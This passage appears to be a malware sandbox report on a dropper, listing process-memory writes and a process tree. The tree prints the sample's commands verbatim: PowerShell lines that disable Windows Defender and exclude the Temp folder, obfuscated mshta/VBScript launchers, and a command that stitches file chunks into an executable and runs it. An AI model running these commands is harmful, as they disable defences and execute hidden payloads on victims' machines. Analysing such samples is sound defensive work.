N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2848 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2848 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2848 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 32 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe
PID 32 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe
PID 32 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe
PID 1460 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4996 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4996 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4996 wrote to memory of 1124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3124 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3124 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3124 wrote to memory of 4504 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1460 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\msiexec.exe
PID 1460 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\msiexec.exe
PID 1460 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\msiexec.exe
PID 1460 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 5048 wrote to memory of 528 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe

"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c06f159e0ec.exe

Tue19c06f159e0ec.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19b4ef3b53293fe.exe

Tue19b4ef3b53293fe.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c1338f41ab.exe

Tue19c1338f41ab.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19325eb008c0b950.exe

Tue19325eb008c0b950.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue192762f1cd058ddf8.exe

Tue192762f1cd058ddf8.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19c78ded4d176ac.exe

Tue19c78ded4d176ac.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1460 -ip 1460

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1969586bcbf58493.exe

Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue1993b3f72c.exe

Tue1993b3f72c.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe

Tue19879c4c0e.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19150ee2be694c8a4.exe

Tue19150ee2be694c8a4.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe

Tue193858933525b62.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19411ac950924ec3f.exe

Tue19411ac950924ec3f.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe

Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-8JCES.tmp\Tue19879c4c0e.tmp" /SL5="$70220,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 632

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe

"C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4EH6A.tmp\Tue19879c4c0e.tmp" /SL5="$6023A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19879c4c0e.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS020D1DB7\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3332 -ip 3332

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue193858933525b62.exe" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3332 -s 360

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9fec6cc40,0x7ff9fec6cc4c,0x7ff9fec6cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2412 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2436 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3292 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4552,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3688,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4984,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4992 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:8

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 8daacf5718a3a2b07d13512e330086bd YPWomczBPkCLgTIkGFcoPg.0.1.0.0.0

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5260,i,10097759564212418794,3567194540959668154,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

